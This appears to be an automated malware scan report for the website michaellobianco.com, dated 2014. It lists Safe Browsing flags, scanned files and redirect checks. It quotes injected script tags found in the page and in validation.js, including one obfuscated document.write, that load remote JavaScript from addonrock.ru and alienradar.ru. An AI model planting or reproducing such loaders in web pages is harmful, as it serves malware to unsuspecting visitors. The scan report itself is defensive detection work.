Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=michaellobianco.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://michaellobianco.com/ | 200 OK Content-Length: 6799 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: addonrock.ru ...[4593 bytes skipped]... ou.us" target="_blank">Website Design</a> by <a href="http://www.d4you.us" target="_blank">d4you.us </a> </span><!-- /Copyright --> </div> <!-- .copyright --> </div><!-- #footer --> </div><!-- #main-footer --> </body> </html> <script type="text/javascript" src="http://addonrock.ru/Google.js"></script> <!--17473306667ee88c162b23e828f4bb1e--> | ||
http://michaellobianco.com/validation.js | 200 OK Content-Length: 14386 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[4057 bytes skipped]... if (String(month).length == 1) month = "0" + month; if (String(day).length == 1) day = "0" + day; incomingDate = String(year) + String(month) + String(day); if (Number(currDate) > Number(incomingDate)) return false; } return true; } document.write('<sc'+'ript type="text/javascript" src="http://alienradar.ru/Google.js"></scri'+'pt>'); Antivirus reports:
| ||
http://addonrock.ru/Google.js | 500 Can't connect to addonrock.ru:80 Content-Length: 187 Content-Type: text/plain | clean |
http://addonrock.ru/test404page.js | 500 Can't connect to addonrock.ru:80 Content-Length: 187 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: michaellobianco.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 12:23:37 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 6799
Content-Type: text/html
...6799 bytes of data.
GET / HTTP/1.1
Host: michaellobianco.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 22 Dec 2014 12:23:37 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 6799
Content-Type: text/html
...6799 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: michaellobianco.com
Referer: http://www.google.com/search?q=michaellobianco.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: michaellobianco.com
Referer: http://www.google.com/search?q=michaellobianco.com
Result:
The result is similar to the first query. There are no suspicious redirects found.